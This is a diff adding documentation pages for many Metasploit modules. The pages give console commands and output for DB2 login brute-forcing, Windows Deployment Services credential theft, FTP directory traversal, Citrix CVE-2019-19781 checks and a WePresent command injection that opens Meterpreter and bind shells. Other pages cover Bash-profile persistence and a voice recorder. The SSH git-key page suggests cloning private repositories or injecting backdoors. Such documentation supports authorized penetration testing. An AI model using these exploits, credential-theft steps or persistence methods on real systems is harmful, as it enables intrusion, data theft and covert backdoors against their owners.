-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Server Signature: true 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Server Messages: true 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Password Saving Prohibited: false 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Password Changing: false 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Copy File: true 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548  Machine Type: Netatalk2.2.5 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548  AFP Versions: AFP2.2, AFPX03, AFP3.1, AFP3.2, AFP3.3 
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548 Server Name: ubuntu
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548  Server Flags:
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Super Client: true
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  UUIDs: true
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  UTF8 Server Name: true
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Open Directory: true
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Reconnect: false
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Server Notifications: true
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  TCP/IP: true
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Server Signature: true
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Server Messages: true
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Password Saving Prohibited: false
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Password Changing: false
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  Copy File: true
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548  Machine Type: Netatalk2.2.5
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548  AFP Versions: AFP2.2, AFPX03, AFP3.1, AFP3.2, AFP3.3
  [*] 1.1.1.1:548 - AFP 1.1.1.1:548  UAMs: Cleartxt Passwrd, DHX2
  [*] 1.1.1.1:548 - AFP 1.1.1.1:548  Server Signature: 975394e16633312406281959287fcbd9
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548  Server Network Address: 
-  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  1.1.1.1 
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548  Server Network Address:
+  [*] 1.1.1.1:548 - AFP 1.1.1.1:548     *  1.1.1.1
  [*] 1.1.1.1:548 - AFP 1.1.1.1:548   UTF8 Server Name: ubuntu
  [*] 1.1.1.1:548 - Scanned 1 of 1 hosts (100% complete)
  [*] Auxiliary module execution completed
@@ -0,0 +1,32 @@
+## Vulnerable Application
+
+This module attempts to authenticate against a DB2 instance using username and password combinations indicated by the `USER_FILE`, `PASS_FILE`, and `USERPASS_FILE` options.
+
+More information can be found on the [Rapid7 Vulnerability & Exploit Database page](https://www.rapid7.com/db/modules/auxiliary/scanner/db2/db2_auth)
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: `use auxiliary/scanner/db2/db2_auth`
+  3. Do: `set RHOSTS [ip]`
+  4. Do: `run`
+
+## Scenarios
+
+###  A run on Kali Linux 2019.3 and DB2 11.5.0.0a
+
+    ```
+    msf > use auxiliary/scanner/db2/db2_auth
+    msf auxiliary/scanner/db2/db2_auth) > show options
+    msf auxiliary/scanner/db2/db2_auth) > set USERNAME db2inst1
+    msf auxiliary/scanner/db2/db2_auth) > set PASSWORD db2pass
+    msf auxiliary(scanner/db2/db2_auth) > set DATABASE testdb
+    msf auxiliary/scanner/db2/db2_auth) > set RHOST 172.17.0.2
+    msf auxiliary/scanner/db2/db2_auth) > run
+      [-] 172.17.0.2:50000      - 172.17.0.2:50000 - LOGIN FAILED: db2inst1:db2inst1@testdb (Incorrect: )
+      [-] 172.17.0.2:50000      - 172.17.0.2:50000 - LOGIN FAILED: db2inst1:dasusr1@testdb (Incorrect: )
+      [-] 172.17.0.2:50000      - 172.17.0.2:50000 - LOGIN FAILED: db2inst1:db2fenc1@testdb (Incorrect: )
+      [*] 172.17.0.2:50000      - Login Successful: db2inst1:db2pass
+      [*] 172.17.0.2:50000      - Scanned 1 of 1 hosts (100% complete)
+      [*] Auxiliary module execution completed
+    ```
@@ -0,0 +1,27 @@
+## Vulnerable Application
+
+This module queries a DB2 instance information.
+
+More information can be found on the [Rapid7 Vulnerability & Exploit Database page](https://www.rapid7.com/db/modules/auxiliary/scanner/db2/db2_version)
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: `use auxiliary/scanner/db2/db2_version`
+  3. Do: `set RHOSTS [ip]`
+  4. Do: `run`
+
+## Scenarios
+
+###  A run on Kali Linux 2019.3 and DB2 11.5.0.0a
+
+  ```
+  msf > use auxiliary/scanner/db2/db2_version
+  msf auxiliary(scanner/db2/db2_version) > show options
+  msf auxiliary(scanner/db2/db2_version) > set DATABASE testdb
+  msf auxiliary(scanner/db2/db2_version) > set RHOSTS 172.17.0.2
+  msf auxiliary(scanner/db2/db2_version) > run
+    [+] 172.17.0.2:50000      - 172.17.0.2:50000 DB2 - Platform: QDB2/LINUXX8664, Version: SQL11050, Instance: db2inst1, Plain-Authentication: OK
+    [*] 172.17.0.2:50000      - Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+  ```
@@ -0,0 +1,41 @@
+## Vulnerable Application
+
+This module retrieves the client unattend file from Windows Deployment Services RPC service and parses out the stored credentials. Tested against Windows 2008 R2 x64 and Windows 2003 x86.
+
+More information can be found on the [Rapid7 Vulnerability & Exploit Database page](https://www.rapid7.com/db/modules/auxiliary/scanner/dcerpc/windows_deployment_services) and pull request [PR #1420](https://github.com/rapid7/metasploit-framework/pull/1420).
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: `use modules/auxiliary/scanner/dcerpc/windows_deployment_services`
+  3. set RHOST [ip]
+  4. Do: `run`
+
+## Scenarios
+
+### A run on Windows Server 2008 R2 X64
+
+  ```
+  msf > use modules/auxiliary/scanner/dcerpc/windows_deployment_services
+  msf auxiliary(scanner/dcerpc/windows_deployment_services) > show options
+  msf auxiliary(scanner/dcerpc/windows_deployment_services) > set RHOST 192.168.5.1
+  msf auxiliary(scanner/dcerpc/windows_deployment_services) > run
+
+    [*] Binding to 1A927394-352E-4553-AE3F-7CF4AAFCA620:1.0:71710533-beba-4937-8319-b5dbef9ccc36:1@ncacn_ip_tcp:192.168.5.1[5040] ...
+    [+] Bound to 1A927394-352E-4553-AE3F-7CF4AAFCA620:1.0:71710533-beba-4937-8319-b5dbef9ccc36:1@ncacn_ip_tcp:192.168.5.1[5040]
+    [*] Sending X64 Client Unattend request ...
+    [*] Raw version of X64 saved as: C:/Documents and Settings/user/.msf5/loot/20121213104745_default_192.168.5.1_windows.unattend_399005.txt
+    [+] Retrieved wds credentials for X64
+    [*] Sending X86 Client Unattend request ...
+    [*] Sending IA64 Client Unattend request ...
+
+      Windows Deployment Services
+      ===========================
+
+      Architecture  Type  Domain        Username  Password
+      ------------  ----  ------        --------  --------
+      X64           wds   Fabrikam.com  username  my_password
+
+    [*] Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+  ```
@@ -0,0 +1,30 @@
+## Vulnerable Application
+
+Detect UDP services that reply to empty probes.
+
+More information can be found on the [Rapid7 blog page](https://blog.rapid7.com/2014/10/03/adventures-in-empty-udp-scanning/)
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use auxiliary/scanner/discovery/empty_udp`
+3. Do: `set RHOSTS [ip]`
+4. Do: `set RPORT [port]`
+5. Do: `run`
+
+## Scenarios
+
+### A run against Windows XP (X64) using Kali Linux 2019.3
+
+  ```
+  msf auxiliary(scanner/dns/dns_amp) > use auxiliary/scanner/discovery/empty_udp
+  msf auxiliary(scanner/discovery/empty_udp) > set RHOSTS 1.1.1.1
+    RHOSTS => 1.1.1.1
+  msf auxiliary(scanner/discovery/empty_udp) > set RPORT 135
+    RPORT => 135
+  msf auxiliary(scanner/discovery/empty_udp) > run
+    [*] Sending 1032 empty probes to 1.1.1.1->1.1.1.1 (1 hosts)
+    [+] Received #52 from #:135:#1095/udp
+    [*] Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+  ```
@@ -0,0 +1,26 @@
+## Vulnerable Application
+
+This module implements the DLSw information disclosure retrieval. There is a bug in Cisco's DLSw implementation affecting 12.x and 15.x trains that allows an unauthenticated remote attacker to retrieve the partial contents of packets traversing a Cisco router with DLSw configured and active.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use modules/auxiliary/scanner/dlsw/dlsw_leak_capture`
+3. Do: `set RHOSTS [ip]`
+4. Do: `run`
+
+## Scenarios
+
+### IOS version 12.4(8) and Kali Linux 2019.3
+
+  ```
+  msf > use modules/auxiliary/scanner/dlsw/dlsw_leak_capture
+  msf auxiliary(scanner/dlsw/dlsw_leak_capture) > set RHOSTS 192.168.0.1
+    RHOSTS => 192.168.0.1
+  msf auxiliary(scanner/dlsw/dlsw_leak_capture) > run
+    [*] 192.168.0.1:2067      - Checking for DLSw information disclosure (CVE-2014-7992)
+    [+] 192.168.0.1:2067      - Vulnerable to DLSw information disclosure; leaked 72 bytes
+    [*] 192.168.0.1:2067      - DLSw leaked data stored in /root/.msf4/loot/20191124231804_default_192.168.0.1_dlsw.packet.cont_518857.bin
+    [*] 192.168.0.1:2067      - Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+  ```
@@ -0,0 +1,33 @@
+## Vulnerable Application
+
+This module can be used to discover DNS servers which expose recursive name lookups which can be used in an amplification attack against a third party.
+
+BIND 9.4.1-P1: [source](ftp://ftp.isc.org/isc/bind9/9.4.1-P1/bind-9.4.1-P1.tar.gz)
+Ubuntu 7.10: [Gutsy Gibbon](http://old-releases.ubuntu.com/releases/7.10/)
+
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: `use modules/auxiliary/scanner/dns/dns_amp`
+  3. Do: `set DOMAINNAME [domain]`
+  4. Do: `set RHOST [ip]`
+  5. Do: `run`
+
+## Scenarios
+
+### A run on Ubuntu 7.10 (Gutsy Gibbon) and BIND 9.4.1-P1
+
+  ```
+  msf > use modules/auxiliary/scanner/dns/dns_amp
+  msf auxiliary(scanner/dns/dns_amp) > set DOMAINNAME domain.com
+    DOMAINNAME => domain.com
+  msf auxiliary(scanner/dns/dns_amp) > set RHOSTS 192.168.10.254
+    RHOSTS => 192.168.10.254
+  msf auxiliary(scanner/dns/dns_amp) > run
+    [*] Sending DNS probes to 192.168.10.254->192.168.10.254 (1 hosts)
+    [*] Sending 70 bytes to each host using the IN ANY domain.com request
+    [+] 192.168.10.254:53 - Response is 374 bytes [5.34x Amplification]
+    [*] Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+  ```
@@ -0,0 +1,29 @@
+## Vulnerable Application
+
+This module exploits a directory traversal vulnerability found in Konica Minolta FTP Utility 1.0.
+This vulnerability allows an attacker to download arbitrary files from the server by crafting a `RETR` command that includes file system traversal strings such as `..//`.
+
+Link to Konica Minolta FTP Utility 1.00 software download [Exploit-DB](https://www.exploit-db.com/apps/6388a2ae7dd2965225b3c8fad62f2b3b-ftpu_10.zip)
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: `use modules/auxiliary/scanner/ftp/konica_ftp_traversal`
+  3. Do: `set RHOSTS [ip]`
+  4. Do: `run`
+
+## Scenarios
+
+### Konica Minolta FTP Utility 1.00 on Windows 7 (X64)
+
+  ```
+  msf > use modules/auxiliary/scanner/ftp/konica_ftp_traversal
+  msf auxiliary(scanner/ftp/konica_ftp_traversal) > set RHOSTS 1.1.1.1
+    RHOSTS => 1.1.1.1
+  set PATH ../../WINDOWS/win.ini
+    PATH => ../../WINDOWS/win.ini
+  msf auxiliary(scanner/ftp/konica_ftp_traversal) > run
+  [+] 1.1.1.1:21      - Stored ../../WINDOWS/win.ini to /root/.msf4/loot/20191122042114_default_1.1.1.1_konica.ftp.data_003802.ini
+  [*] 1.1.1.1:21      - Scanned 1 of 1 hosts (100% complete)
+  [*] Auxiliary module execution completed
+  ```
@@ -0,0 +1,52 @@
+## Vulnerable Application
+
+This module exploits a directory traversal vulnerability found in PCMan FTP Server 2.0.7.
+This vulnerability allows an attacker to download arbitrary files from the server by crafting a `RETR` command that includes file system traversal strings such as `..//`
+
+Linked to software download [Exploit-DB](https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z)
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: `use modules/auxiliary/scanner/ftp/pcman_ftp_traversal`
+  3. Do: `set RHOSTS [ip]`
+  4. Do: `run`
+
+## Scenarios
+
+### PCMan FTP Server 2.0.7 on Windows 7 (X64)
+
+  ```
+  msf > use modules/auxiliary/scanner/ftp/pcman_ftp_traversal
+  msf auxiliary(scanner/ftp/pcman_ftp_traversal) > show options
+  msf auxiliary(scanner/ftp/pcman_ftp_traversal) > set RHOST 1.1.1.1
+    rhost => 1.1.1.1
+  msf auxiliary(scanner/ftp/pcman_ftp_traversal) > set PATH WINDOWS\\win.ini
+    PATH => WINDOWS\win.ini
+  msf auxiliary(scanner/ftp/pcman_ftp_traversal) > run    
+    [+] 192.168.2.252:21      - Stored WINDOWS\win.ini to /root/.msf4/loot/20191120201523_default_1.1.1.1_pcman.ftp.data_069450.ini
+    [*] 192.168.2.252:21      - Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+  ```
+
+### Manual Exploitation
+
+  ```
+  2019/11/20 [12:46] (00588) 1.1.1.2> User connecting from 1.1.1.2
+
+  2019/11/20 [12:46] (00588) 1.1.1.2> USER anonymous
+  2019/11/20 [12:46] (00588) Anonymous> 331 User name okay, need password.
+
+  2019/11/20 [12:46] (00588) Anonymous> PASS *****
+  2019/11/20 [12:46] (00588) Anonymous> 230 User logged in
+
+  2019/11/20 [12:46] (00588) Anonymous> PASV
+  2019/11/20 [12:46] (00588) Anonymous> 227 Entering Passive Mode (1.1.1.1,8,1)
+
+  2019/11/20 [12:46] (00588) Anonymous> RETR ..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//WINDOWS\win.ini
+  2019/11/20 [12:46] (00588) Anonymous> 150 File status okay; Open data connection.
+
+  2019/11/20 [12:46] (00588) Anonymous> 226 Data Sent okay.
+
+  2019/11/20 [12:46] (00588) Anonymous> User Disconnected.
+  ```
@@ -0,0 +1,57 @@
+## Introduction
+
+An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. The vulnerability, tracked as CVE-2019-19781, allows for directory traversal. If exploited, it could allow an unauthenticated attacker to perform arbitrary code execution.
+
+Because vulnerable servers allow for directory traversal, they will accept the request `GET /vpn/../vpns/` and process it as a request for `GET /vpns/`, a directory that contains PERL scripts that can be targeted to allow for limited file writing on the vulnerable host.
+
+This module checks if a target server is vulnerable by issuing an HTTP GET request for `/vpn/../vpns/cfg/smb.conf`and then checking the response for `[global]` since this configuration file should contain global variables. If `[global]` is found, the server is vulnerable to CVE-2019-19781.
+
+## Verification Steps
+
+1. Install the module as usual
+2. Start msfconsole
+3. Do: `use auxiliary/scanner/http/citrix_dir_traversal`
+4. Do: `set RHOSTS [IP]`
+5. Do: `run`
+
+## Options
+
+1. `Proxies`. This option is not set by default.
+2. `RPORT`. The default setting is `80`. To use: `set RPORT [PORT]`
+3. `SSL`. The default setting is `false`.
+4. `THREADS`. The default setting is `1`.
+5. `VHOST`. This option is not set by default.
+6. `TARGETURI`. This option is the base path. `/` by default.
+7. `PATH`. This option is the traversal path. `/vpn/../vpns/cfg/smb.conf` by default.
+
+## Scenarios
+
+```
+msf5 auxiliary(scanner/http/citrix_dir_traversal) > options
+
+Module options (auxiliary/scanner/http/citrix_dir_traversal):
+
+   Name       Current Setting            Required  Description
+   ----       ---------------            --------  -----------
+   PATH       /vpn/../vpns/cfg/smb.conf  yes       Traversal path
+   Proxies                               no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     127.0.0.1                  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      8080                       yes       The target port (TCP)
+   SSL        false                      no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                          yes       Base path
+   THREADS    1                          yes       The number of concurrent threads (max one per host)
+   VHOST                                 no        HTTP server virtual host
+
+msf5 auxiliary(scanner/http/citrix_dir_traversal) > run
+
+[+] http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf - The target is vulnerable to CVE-2019-19781.
+[+] Obtained HTTP response code 200 for http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf. This means that access to /vpn/../vpns/cfg/smb.conf was obtained via directory traversal.
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf5 auxiliary(scanner/http/citrix_dir_traversal) >
+```
+
+## References
+
+1. <https://nvd.nist.gov/vuln/detail/CVE-2019-19781>
+2. <https://support.citrix.com/article/CTX267027>
@@ -0,0 +1,67 @@
+## Vulnerable Application
+
+Enumerate TCP services via the FTP bounce PORT/LIST method
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use modules/auxiliary/scanner/portscan/ftpbounce`
+3. Do: `set BOUNCEHOST [ip]`
+4. Do: `set PORTS [number(s)]`
+5. Do: `set RHOSTS [ip]`
+6. Do: `set FTPUSER [user]`
+7. Do: `set FTPPASS [password]`
+8. Do: `run`
+
+## Scenarios
+
+Docker Usage:  `docker run -e "ADDED_FLAGS=-w -W -d -d" -e FTP_USER_NAME=bob -e FTP_USER_PASS=12345 -e FTP_USER_HOME=/home/bob stilliard/pure-ftpd`
+
+### PureFTPd and Kali Linux 2019.3
+
+  ```
+  msf > use modules/auxiliary/scanner/portscan/ftpbounce
+  msf auxiliary(scanner/portscan/ftpbounce) > set BOUNCEHOST 172.17.0.2
+    BOUNCEHOST => 172.17.0.2
+  msf auxiliary(scanner/portscan/ftpbounce) > set PORTS 8080
+    BOUNCEPORT => 8080
+  msf auxiliary(scanner/portscan/ftpbounce) > set RHOSTS 172.17.0.4
+    RHOSTS => 172.17.0.4
+  msf auxiliary(scanner/portscan/ftpbounce) > set FTPUSER bob
+    FTPUSER => bob
+  msf auxiliary(scanner/portscan/ftpbounce) > set FTPPASS 12345
+    FTPPASS => 12345
+  msf auxiliary(scanner/portscan/ftpbounce) > run
+
+    [+] 172.17.0.2:21 -  TCP OPEN 172.17.0.4:8080
+    [*] 172.17.0.2:21 - Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+  ```
+
+#### Manual Exploitation
+
+  ```
+  root@ubuntu:~# nmap -p 8080 -v -b bob:12345@172.17.0.2 172.17.0.4 -Pn
+
+    Starting Nmap 7.60 ( https://nmap.org ) at 2019-11-25 20:34 UTC
+    Resolved FTP bounce attack proxy to 172.17.0.2 (172.17.0.2).
+    Initiating Parallel DNS resolution of 1 host. at 20:34
+    Completed Parallel DNS resolution of 1 host. at 20:34, 0.00s elapsed
+    Attempting connection to ftp://bob:12345@172.17.0.2:21
+    Connected:220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
+    220-You are user number 1 of 5 allowed.
+    220-Local time is now 20:34. Server port: 21.
+    220-This is a private system - No anonymous login
+    220-This server supports FXP transfers
+    220-IPv6 connections are also welcome on this server.
+    220 You will be disconnected after 15 minutes of inactivity.
+    Login credentials accepted by FTP server!
+    Initiating Bounce Scan at 20:34
+    Discovered open port 8080/tcp on 172.17.0.4
+    Completed Bounce Scan at 20:34, 0.00s elapsed (1 total ports)
+    Nmap scan report for 172.17.0.4
+    Host is up.
+
+    PORT     STATE SERVICE
+    8080/tcp open  http-proxy
+  ```
@@ -0,0 +1,59 @@
+## Introduction
+
+This module attempts to authenticate to Git servers using compromised SSH private keys. This module can be used to check a single key or recursively look through a directory. It will not attempt to check keys that have a passphrase, however a bruteforce attack could be launched on a key and then the passphrase could be disabled.
+
+## Setup
+
+1. `ssh-keygen -b 2048 -t rsa`
+2. Add the RSA pubic key to a GitHub or GitLab account (Public ends in .pub)
+3. Follow the usage instructions below
+4. Either use KEY_FILE or KEY_DIR to specify the generated SSH private key
+5. Run the module
+6. Observe that it will identify the GitHub/GitLab user that this key belongs to
+
+## Usage
+
+```
+msf5 > use auxiliary/scanner/ssh/ssh_enum_git_keys
+msf5 auxiliary(scanner/ssh/ssh_enum_git_keys) > set KEY_DIR /Users/w/.ssh
+KEY_DIR => /Users/w/.ssh
+msf5 auxiliary(scanner/ssh/ssh_enum_git_keys) > run
+
+Git Access Data
+===============
+
+Key Location              User Access
+------------              -----------
+/Users/w/.ssh/id_ed25519  wdahlenburg
+
+[*] Auxiliary module execution completed
+```
+## Post Exploitation
+
+Once you have identified a Git user from an SSH key, there are two immediate possibilities.
+
+1. Download private repositories that the owner knows
+2. Modify public repositories and inject a backdoor
+
+To begin either, the valid keys will need to be added to the current `~/.ssh/config`.
+
+Example: Using a valid key at /Users/w/.ssh/id_ed25519
+
+1. Write the following to `~/.ssh/config`
+`Host github
+    User git
+    Hostname github.com
+    PreferredAuthentications publickey
+    IdentityFile /Users/w/.ssh/id_ed25519
+    `
+2. Clone a repo using the key
+` $ git clone github:<username>/Repo.git`
+3. Alternatively, modify an existing local repo by modifying the .git/config file
+```
+...
+[remote "origin"]
+    url = github:username/reponame.git
+...
+
+```
+4. Any changes will be pushed using the specified key. Make sure you set the git aliases to match your target.
@@ -0,0 +1,38 @@
+## Vulnerable Application
+
+This module dials a range of phone numbers and records audio from each answered call.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use modules/auxiliary/scanner/voice/recorder`
+3. Do: `set IAX_HOST [ip]`
+4. Do: `set OUTPUT_PATH [path]`
+5. Do: `set TARGETS [phone numbers]`
+6. Do: `run`
+
+## Scenarios
+
+ ```
+  msf > use modules/auxiliary/scanner/voice/recorder
+  msf auxiliary(scanner/voice/recorder) > set IAX_HOST 10.0.183.93
+    IAX_HOST => 10.0.183.93
+  msf auxiliary(scanner/voice/recorder) > set OUTPUT_PATH /root/audio
+    OUTPUT_PATH => /root/voice
+  msf auxiliary(scanner/voice/recorder) > set TARGETS 123-456-7890
+    TARGETS => 123-456-7890
+  msf auxiliary(scanner/voice/recorder) > run
+    [*] Dialing 123-456-7890...
+    [*]   Number: 123-456-7890 ringing  Frames 0 DTMF ''
+    [*]   Number: 123-456-7890 ringing  Frames 0 DTMF ''
+    [*]   Number: 123-456-7890 ringing  Frames 0 DTMF ''
+    [*]   Number: 123-456-7890 answered  Frames 51 DTMF ''
+    [*]   Number: 123-456-7890 answered  Frames 101 DTMF ''
+    [*]   Number: 123-456-7890 answered  Frames 151 DTMF ''
+    [*]   Number: 123-456-7890 answered  Frames 201 DTMF ''
+    [*]   Number: 123-456-7890 answered  Frames 252 DTMF ''
+    [*]   Number: 123-456-7890 answered  Frames 302 DTMF ''
+    [*]   Completed   Number: 123-456-7890  State: hangup Frames: 302 DTMF ''
+    [+] 123-456-7890 resulted in 15420 bytes of audio to /root/audio/123-456-7890.raw
+    [*] Auxiliary module execution completed
+  ```
@@ -78,7 +78,7 @@ Set this to `true` to override the `check` result during exploitation.
 ## Usage

 ```
-msf5 exploit(unix/webapp/webmin_backdoor) > run
+msf5 exploit(linux/http/webmin_backdoor) > run

 [*] Started reverse TCP handler on 172.28.128.1:4444
 [*] Webmin 1.890 detected
@@ -95,9 +95,9 @@ uname -a
 Linux ubuntu-xenial 4.4.0-141-generic #167-Ubuntu SMP Wed Dec 5 10:40:15 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
 ^Z
 Background session 1? [y/N]  y
-msf5 exploit(unix/webapp/webmin_backdoor) > set target 1
+msf5 exploit(linux/http/webmin_backdoor) > set target 1
 target => 1
-msf5 exploit(unix/webapp/webmin_backdoor) > run
+msf5 exploit(linux/http/webmin_backdoor) > run

 [*] Started reverse TCP handler on 172.28.128.1:4444
 [*] Webmin 1.890 detected
@@ -0,0 +1,96 @@
+## Vulnerable Application
+
+This module exploits [CVE-2019-3929](https://nvd.nist.gov/vuln/detail/CVE-2019-3929). The vulnerability affects [WePresent](https://www.barco.com/en/page/wepresent) devices, as well as many OEM devices (listed below). The vulnerability is an unauthenticated remote command injection via HTTP POST request to the /cgi-bin/file_transfer.cgi endpoint. 
+
+The following devices are known to be affected by this issue:
+
+* Barco wePresent WiPG-1000P <= 2.3.0.10
+* Barco wePresent WiPG-1600W <= 2.4.1.19
+* Crestron AM-100 <= 1.6.0.2
+* Crestron AM-101 <= 2.7.0.1
+* Extron ShareLink 200/250 <= 2.0.3.4
+* Teq AV IT WIPS710 <= 1.1.0.7
+* InFocus LiteShow3 <= 1.0.16
+* InFocus LiteShow4 <= 2.0.0.7
+* Optoma WPS-Pro <= 1.0.0.5
+* Blackbox HD WPS <= 1.0.0.5
+* SHARP PN-L703WA <= 1.4.2.3
+
+## Verification Steps
+
+  1. Acquire one of the vulnerable devices.
+  2. Start msfconsole
+  3. Do: `use exploit/linux/http/wepresent_cmd_injection`
+  4. Do: `set RHOSTS <device ip>`
+  5. Do: `check`
+  6. The module should indicate if the target is vulnerable or not.
+  7. Do: `set LHOST <ip>`
+  8. Do: run
+  9. A meterpreter session should be started
+
+## Scenarios
+
+### Tested against Crestron AM-100 1.6.0.2 
+
+#### Meterpreter
+
+```
+msf5 > use exploit/linux/http/wepresent_cmd_injection 
+msf5 exploit(linux/http/wepresent_cmd_injection) > set RHOSTS 10.12.70.246
+RHOSTS => 10.12.70.246
+msf5 exploit(linux/http/wepresent_cmd_injection) > set LHOST 10.12.70.238
+LHOST => 10.12.70.238
+msf5 exploit(linux/http/wepresent_cmd_injection) > check
+[+] 10.12.70.246:443 - The target is vulnerable.
+msf5 exploit(linux/http/wepresent_cmd_injection) > run
+
+[*] Started reverse TCP handler on 10.12.70.238:4444 
+[*] Command Stager progress -   9.95% done (127/1276 bytes)
+[*] Command Stager progress -  19.98% done (255/1276 bytes)
+[*] Command Stager progress -  29.94% done (382/1276 bytes)
+[*] Command Stager progress -  39.97% done (510/1276 bytes)
+[*] Command Stager progress -  50.00% done (638/1276 bytes)
+[*] Command Stager progress -  59.95% done (765/1276 bytes)
+[*] Command Stager progress -  69.75% done (890/1276 bytes)
+[*] Command Stager progress -  79.62% done (1016/1276 bytes)
+[*] Command Stager progress -  89.50% done (1142/1276 bytes)
+[*] Sending stage (904600 bytes) to 10.12.70.246
+[*] Command Stager progress - 100.08% done (1277/1276 bytes)
+[*] Command Stager progress - 101.33% done (1293/1276 bytes)
+[*] Meterpreter session 1 opened (10.12.70.238:4444 -> 10.12.70.246:40805) at 2020-01-09 05:53:34 -0500
+
+meterpreter > shell
+Process 31774 created.
+Channel 1 created.
+uname -a
+Linux Crestron.AirMedia-1.1.wm8750 2.6.32.9-default #30 Wed Jul 12 13:56:45 CST 2017 armv6l GNU/Linux
+```
+
+#### Busybox/Telnetd Bind Shell
+
+```
+msf5 > use exploit/linux/http/wepresent_cmd_injection 
+msf5 exploit(linux/http/wepresent_cmd_injection) > set target 0
+target => 0
+msf5 exploit(linux/http/wepresent_cmd_injection) > set payload cmd/unix/bind_busybox_telnetd 
+payload => cmd/unix/bind_busybox_telnetd
+msf5 exploit(linux/http/wepresent_cmd_injection) > set RHOSTS 10.12.70.246
+RHOSTS => 10.12.70.246
+msf5 exploit(linux/http/wepresent_cmd_injection) > set LHOST 10.12.70.238
+LHOST => 10.12.70.238
+msf5 exploit(linux/http/wepresent_cmd_injection) > check
+[+] 10.12.70.246:443 - The target is vulnerable.
+msf5 exploit(linux/http/wepresent_cmd_injection) > run
+
+[*] Started bind TCP handler against 10.12.70.246:4444
+[*] Command shell session 1 opened (10.12.70.238:41457 -> 10.12.70.246:4444) at 2020-01-09 05:56:36 -0500
+
+whoami
+whoami
+root
+~/boa/cgi-bin # uname -a
+uname -a
+Linux Crestron.AirMedia-1.1.wm8750 2.6.32.9-default #30 Wed Jul 12 13:56:45 CST 2017 armv6l GNU/Linux
+~/boa/cgi-bin # 
+```
+
@@ -0,0 +1,50 @@
+## Description
+
+  This module establishes persistence via the Linux Bash profile method.
+  This module makes two changes to the target system.
+  First, the module writes a payload to a directory (`/var/temp/` by default).
+  Second, the module writes a payload execution trigger to the Bash profile (`~/.bashrc` by default).
+  The persistent payload is executed whenever the victim user opens a Bash terminal.
+
+## Vulnerable Application
+
+  This module has been tested successfully on:
+
+  * Ubuntu 19 (x86_64) running GNU bash, version 5.0.3(1)-release
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get a Meterpreter session
+  3. `use exploit/linux/local/bash_profile_persistence`
+  4. `set SESSION [SESSION]`
+  5. `run`
+  6. On victim, open a new Bash terminal
+  7. You should get a new session with the permissions of the exploited user account
+
+## Options
+
+  **BASH_PROFILE**
+
+  The path to the target Bash profile. (default: `~/.bashrc`)
+
+  **PAYLOAD_DIR**
+
+  A writable directory file system path. (default: `/var/tmp`)
+
+## Scenarios
+
+```
+msf5 > use exploit/linux/local/bash_profile_persistence
+msf5 exploit(linux/local/bash_profile_persistence) > set SESSION 1
+msf5 exploit(linux/local/bash_profile_persistence) > exploit
+
+[*] Bash profile exists: /home/user/.bashrc
+[*] Bash profile is writable: /home/user/.bashrc
+[*] Created backup Bash profile: /root/.msf4/logs/persistence/192.168.1.191_20191128.130945_Bash_Profile.backup
+[*] Writing '/var/tmp/IgHypGLMglheQ' (126 bytes) ...
+[+] Wrote payload trigger to Bash profile
